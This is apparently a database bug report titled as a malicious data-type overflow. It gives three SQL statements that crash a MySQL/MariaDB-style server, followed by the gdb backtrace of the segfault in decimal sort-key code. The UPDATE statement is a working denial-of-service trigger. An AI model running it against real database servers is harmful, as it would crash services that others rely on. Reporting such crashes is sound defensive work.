Malicious data type overflow in joint query leads to service coredump

create table tb1 ( col1 int unique,col2 int unique);

insert into tb1 (col1,col2) values (100,200);

update tb1 set col1= case 11 when 0 then 'x' when 'x' then 'x' end order by col1,(select 2555555555.5555555555 union select 0 union select -1),col2 desc,col2,col1;

ERROR 2013 (HY000): Lost connection to MySQL server during query

#0  __pthread_kill (threadid=<optimized out>, signo=11) at ../sysdeps/unix/sysv/linux/pthread_kill.c:56

56      ../sysdeps/unix/sysv/linux/pthread_kill.c: 没有那个文件或目录.

[Current thread is 1 (Thread 0x7ff1fc236700 (LWP 30208))]

(gdb) bt

#0  __pthread_kill (threadid=<optimized out>, signo=11) at ../sysdeps/unix/sysv/linux/pthread_kill.c:56

#1  0x0000557666840dc8 in handle_fatal_signal ()

#2  <signal handler called>

#3  0x000055766693773f in my_decimal2binary(unsigned int, my_decimal const*, unsigned char*, int, int) ()

#4  0x000055766683da7b in Type_handler_decimal_result::make_sort_key(unsigned char*, Item*, SORT_FIELD_ATTR const*, Sort_param*) const ()

#5  0x000055766683cd65 in ?? ()

#6  0x000055766683fc9f in filesort(THD*, TABLE*, Filesort*, Filesort_tracker*, JOIN*, unsigned long long) ()

#7  0x000055766670938f in mysql_update(THD*, TABLE_LIST*, List<Item>&, List<Item>&, Item*, unsigned int, st_order*, unsigned long long, bool, unsigned long long*, unsigned long long*) ()

#8  0x0000557666664e31 in mysql_execute_command(THD*) ()

#9  0x000055766666aca9 in mysql_parse(THD*, char*, unsigned int, Parser_state*, bool, bool) ()

#10 0x000055766666cb45 in dispatch_command(enum_server_command, THD*, char*, unsigned int, bool, bool) ()

#11 0x000055766666e342 in do_command(THD*) ()

#12 0x0000557666745ad6 in do_handle_one_connection(CONNECT*) ()

#13 0x0000557666745c4d in handle_one_connection ()

#14 0x00007ff206f06fa3 in start_thread (arg=<optimized out>) at pthread_create.c:486

#15 0x00007ff20698e60f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95